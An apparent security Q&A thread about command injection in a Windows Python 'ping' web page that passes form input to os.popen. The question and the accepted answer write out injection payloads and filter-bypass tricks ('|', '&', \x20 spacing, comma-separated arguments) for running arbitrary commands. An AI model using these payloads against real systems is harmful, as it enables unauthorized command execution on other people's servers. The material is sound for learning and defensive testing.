# Full shell from pingit application

Tags: windows, injection, batch

when I entered 127.0.0.1 the result was:-

```
Pinging 127.0.0.1 with 32 bytes of data:

Reply from 127.0.0.1: bytes=32 time<1ms TTL=128

Ping statistics for 127.0.0.1:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms
```

when I entered `127.0.0.1%00` I got the following result:-

```
Traceback (most recent call last): File "C:\Inetpub\wwwroot\pingit.py", line 9, in output=os.popen("ping " + form["action"].value).readlines() TypeError: popen() argument 1 must be string without null bytes, not str
```

I can execute single word commands like dir, whoami, etc like:-

```
127.0.0.1 | dir 
and
127.0.0.1 | whoami 
but cannot execute the following commands
127.0.0.1 | net user
```

How can I get full shell command execution with such restrictions

Comment: Why did you use `127.0.0.1%00`? What effect were you hoping to have?

Comment: @schroeder the null byte resulted into an error as popen cannot handle  null bytes hence i added the same

Comment: @schroeder the title of this question was misleading now if you think it is correct please remove the hold

Answer (score 3, accepted):

Use the `&` operator to combine two or more commands on windows (for unix use the `;` operator).

If you need your command to be a string with no empty spaces, you could replace all space characters with their hex value  (\x20), so the `dir` command would be:

```
127.0.0.1\x20&\x20dir
```

Note that this method works only with the Python interperter.

An alternative that works well with Python's `os.popen` and on windows termilal would be to use a comma between your parameters and remove all spaces between the commands, eg:

```
127.0.0.1&dir,c:\users
```